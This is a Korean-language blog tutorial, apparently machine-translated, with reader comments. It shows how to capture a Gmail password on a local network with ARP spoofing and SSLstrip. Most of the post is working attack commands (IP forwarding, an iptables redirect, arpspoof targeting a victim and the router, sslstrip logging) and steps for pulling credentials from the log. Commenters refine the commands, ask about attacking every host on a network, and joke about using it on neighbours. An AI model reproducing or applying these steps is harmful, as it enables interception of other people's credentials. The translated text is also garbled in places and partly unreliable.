ArpSpoofing 및 SSlstrip이 작동합니다.

안녕하세요 Bloggers.

오늘은 우리 중 많은 사람들이 좋아하는 보안되지 않은 네트워크에 연결하는 것이 얼마나 위험한 지에 대한 작은 샘플이 있습니다.

오늘은 Sslstrip과 함께 ArpSpoofing을 사용하여 Gmail 비밀번호를 얻을 것입니다. 환경을보다 통제하기 위해 ""라는 계정을 만들었습니다.testarp@gmail.com".

그리고 저는 서문이별로 마음에 들지 않으므로 사업에 착수합시다.

나는 그들이 다음 정보로 무엇을 할 수 있는지에 대해 어떠한 책임도지지 않습니다. 교육 목적으로 만 수행합니다.

환경

이 테스트를 위해 우리가 가진 것은 다음과 같습니다.

1. 공격자 : Debian Wheezy가있는 데스크탑 또는 데스크탑 컴퓨터입니다. 저장소에서 설치할 수 있습니다. SSL 스트립 y 디스니프 가지기 위해 위장

2. 피해자 : 피해자는 브라우저를 통해서만 자신의 메일을보고 싶어하는 Android 태블릿입니다.

3. 매체 : 중간은 내 Cisco DPC2425 라우터

구애.

공격자 주소 : 172.26.0.2

라우터 주소: 172.26.0.1

피해자 주소 : 172.26.0.8

공격:

공격이 어떻게 작동하는지 조금 더 이해하려면 내 이전 POST

이 공격을 위해 우리가 할 첫 번째 일은 우리 컴퓨터가 피해자가 인식하지 못한 채 정보를 전달할 수 있도록 포워드를 활성화하는 것입니다. (그렇지 않으면 서비스 거부 공격이됩니다.)

이를 위해 다음을 사용합니다.

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

직접 콘솔 창의 각 명령.

이제 tail -f를 수행하면 desdelinux 우리는 정보를 실시간으로 직접 봅니다.

스냅 샷 1

그렇다면 우리가 원하는 것을 어떻게 얻을 수 있습니까?

먼저 태블릿에 메일을 입력하겠습니다. 로그인하는 동안 콘솔에 수천 개의 항목이 표시됩니다.

이제 완료되었으므로 파일을 열어보겠습니다.desdelinux"나노와 함께

nano desdelinux

Control + W를 사용하여 SECURE POST라는 것을 검색합니다.

그리고 우리는 이와 같은 것을 보게 될 것입니다.

스냅 샷 2

보이지 않는 거대한 라인 중에는 피해자의 이메일과 비밀번호가 있습니다.

그래서 우리는 터널 끝에서 마침내 빛을 볼 때까지 오른쪽으로 달려갑니다.

스냅 샷 3

또 다른 경우에 우리는 이러한 공격으로부터 우리 자신을 보호 할 수있는 방법을 보게 될 것입니다.

안부


코멘트를 남겨주세요

귀하의 이메일 주소는 공개되지 않습니다. 필수 필드가 표시되어 있습니다 *

*

*

  1. 데이터 책임자 : Miguel Ángel Gatón
  2. 데이터의 목적 : 스팸 제어, 댓글 관리.
  3. 합법성 : 귀하의 동의
  4. 데이터 전달 : 법적 의무에 의한 경우를 제외하고 데이터는 제 XNUMX 자에게 전달되지 않습니다.
  5. 데이터 저장소 : Occentus Networks (EU)에서 호스팅하는 데이터베이스
  6. 권리 : 귀하는 언제든지 귀하의 정보를 제한, 복구 및 삭제할 수 있습니다.

  1.  

    나는이 기회에 게시물이 게시되었을 때 명령이 옳지 않다고 말할 수 있습니다.

    끝에있는 iptables 명령에는 다른 줄에있는 8080이 없습니다. 그리고 arpspoof 명령은 모두 같은 줄에있었습니다. 각 명령은 다른 줄에 있습니다.

    편집자가보고 수정할 수 있기를 바랍니다.

    인사말.

    1.    마누엘 데 라 푸 엔테

      말씀하신 내용을 수정했습니다. 괜찮습니까?

      선호하는 항목에 코드를 삽입하려는 경우 HTML보기를 사용하고 기사를 보류 중으로 보내기 전에 기사가 올바른지 확인하십시오. 감사합니다.

  2.   루이스

    지식이없는 사람들이 너무 취약하다는 사실을 아는 것은 무섭습니다. 주제를 거의 이해하지 못하더라도 아주 좋은 정보는 중요하다는 것을 깨닫습니다. 감사합니다!
    안부

  3.   Giskard

    그러나 이는 공격자와 피해자가 동일한 네트워크에있는 경우에만 작동합니다. 어쨌든 (동일한 네트워크에 있음) HTTPS를 사용하여 연결하면 컴퓨터를 떠나기 전에 데이터가 암호화되기 때문에 발생하지 않는 것 같습니다. HTTP (S없이)로 연결하면 네트워크 케이블을 봐도 키가 보인다고 생각합니다.

    1.   

      사실이 아닙니다. 나는 gmail 비밀번호를 해킹하고 있으며 gmail이 https를 사용하는 것을 발견하면. 그래서? 요점은 https는 안전하지만 http에 의존한다는 것입니다. 그래서 그렇게 안전하지 않습니다.

      S가 수퍼맨이 아니라 "안전"을위한 것이라고 https에 대해 너무 많이 고백하지 마십시오.

    2.    르텐

      https의 유무에 관계없이 작동하며 더 전문화 된 Linux 배포판으로 시도했으며 문제없이 작동합니다.

    3.    마누엘 데 라 푸 엔테

      Wi-Fi를 훔친 사람들에게 교훈을 가르치는 데 정확하게 사용할 수 있습니다. 😀

      오래 전에 Chema Alonso의 블로그에서 말한 것과 비슷합니다.

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    레이온

        Ostia, 대단한 일입니다! / 그리고 그들은 은행 계좌를 확인하러 갈 때 VPN을 사용할 때마다 편집증 환자에게 말합니다 ...). 그건 그렇고 당신은 댓글에 냉소적 인 사람들이 얼마나 있는지 봐야합니다 ... 결국 그것이 도둑질이라면 ...

        1.    엘리오타임3000

          이제 자신 만의 VPN 서비스를 만들고 제공하는 방법에 대한 자습서를 가져와야합니다.

      2.    다니엘

        당신이 연결하는 이야기는 매우 흥미롭고 소설 책으로도 가치가있는 것 같고, 이것은 내가 이웃의 인터넷을 사용했을 때를 기억하게합니다. 그리고 내가 주제를 안다고 말하지만 내가 가질 수있는 위험의 진정한 차원을 결코 볼 수 없었던 것 같아요 마지막으로 다행스럽게도 그들은 암호를 WPA2로만 변경했으며 ISP와의 이야기가 시작된 곳입니다. haha

    4.    마우

      그것이 제목이 Sslstrip in action이라고 말하는 이유입니다.

      공격자가 중간에있는 한 작동합니다.

  4.  

    프리즘에서 작업하는 파동은 무엇입니까? -.-
    아뇨.
    귀하의 요청을 보내기 위해 무엇을 기다리고 계십니까 XD
    안부
    좋은 게시물

  5.   오로스Zx

    흥미롭게도, 나중에 교육 테스트를 할 것입니다 ... 어쩌면 Wi-Fi의 비밀번호를 제거하고 조금만 재미있게 지낼 수도있을 것입니다 😛
    혹시 타겟이 요청한 페이지에 다른 페이지를 보내기 위해 비슷한 일을 할 수 있습니까? 예를 들어, 그들은 Facebook을 열고 싶어하고 Google로 리디렉션합니까? 😛

    1.   

      예. 그러나 그것은 모두 매우 다른 롤입니다.

      나중에 게시 할 수도 있습니다.

  6.   마지막 새내기

    매우 좋은 게시물,이 주제는 매우 교육적입니다. 이제 우리는이 공격에 대응할 수 있어야합니다. 저와 같은 일부 (예 : 대학)가 공용 네트워크 (예 : 대학)에 연결되기 때문에이를 피하는 것이 도움이 될 것입니다.

    안녕하십니까!

  7.   그냥 또 다른 DL 사용자

    나를 위해 작동하지 않았습니다 🙁

  8.   워커

    https 연결이 서버 인증서를 통해 암호화된다는 사실 (컴퓨터에 인증서가 있으면 브라우저가 암호화를 담당 함)을 제외하고는 iptables를 사용하여 포트 80 (http)을 리디렉션한다는 사실을 제외하면 뭔가 실패합니다. , https 인 443이 아닙니다.

    1.   

      나도 그렇게 생각했다. 요점은 https가 "안전"하지만 불행히도 http에 의존한다는 것입니다. 따라서 sslstrip은이를 활용하여 브라우저가 https 자격 증명을 사용하고 있다고 믿게하지만 그렇지 않습니다.

      1.    워커

        이런 젠장! 하지만 브라우저에 "이 인증서는 의심스러운 사이트에서 온 것입니다."라는 경고가 표시되어야합니다. XD 테스트를 반드시 수행해야합니다.

        1.   

          아니, 아무것도 나오지 않습니다.

  9.   그냥 또 다른 DL 사용자

    마침내 나를 위해 일했습니다.
    암호로 WEP 네트워크에 연결되어 있는데 어쨌든 암호를 직접 보여주었습니다.

    쿼리. 이 동일한 절차를 수행 할 수 있지만 단일 희생자가 아닌 네트워크에 연결된 모든 컴퓨터에 대해 수행 할 수 있습니까?

    1.   

      그래 넌 할수있어. 그러나 나는 실험을하지 않았습니다. 직접 시도해보고 어떻게 지내고 있는지 알려주세요.

  10.   신닉19

    내가 이것으로 얻는 유일한 것은 피해자의 컴퓨터가 오프라인 상태가되지만 sslstrip은 나에게 아무것도 표시하지 않는다는 것입니다. /

    1.   

      잠시 방화벽을 비활성화해야합니다. 또는 적어도 들어오는 연결을 활성화하십시오.

  11.   미스터 블랙

    조사를하면 페이스 북 페이지의 사용자 이름과 비밀번호 만 볼 수있었습니다. Gmail에서는 로그에서 결과를 찾지 못했고 arpspoof«arpspoof -i -t«줄만 필요했습니다. 반면에 피해자 컴퓨터는 일부 페이지를 열 수 없습니다. 나는 계속 조사 할 것이다. 매우 흥미 롭다. Manjaro를 사용하는 사람들을위한 도움말, 설치할 패키지는 dsniff (여기에 arpspoff), twisted 및 python2-pyopenssl입니다. Sslstrip은 여기에서 다운로드 할 수 있습니다. http://www.thoughtcrime.org/software/sslstrip/
    그것을 실행하려면 $ python2 sslstrip.py
    인사말.

  12.   미스터 블랙

    나오지 않았지만 arpspoof 라인은 다음과 같습니다. #arpspoof -i int -t ip-victim ip-router

  13.   길버트

    내가 당신이 말한대로 해요 :

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    문제는 내가 여기 내 방에있는 또 다른 PC 인 피해자가 라우터를 다시 시작해야하는 지점에 연결하지 않고 남겨진다는 것입니다. 내가 무엇을해야하는지 도와주세요.

    또 다른 한 가지는 가상 머신으로 작업하고 있는데 iwconfig 명령을 실행할 때 wlan0이 나타나지 않고 ifconfig를 실행할 때도 나타나지 않지만 가상 머신에 인터넷이 있으면 eth0 인터페이스를 사용합니다.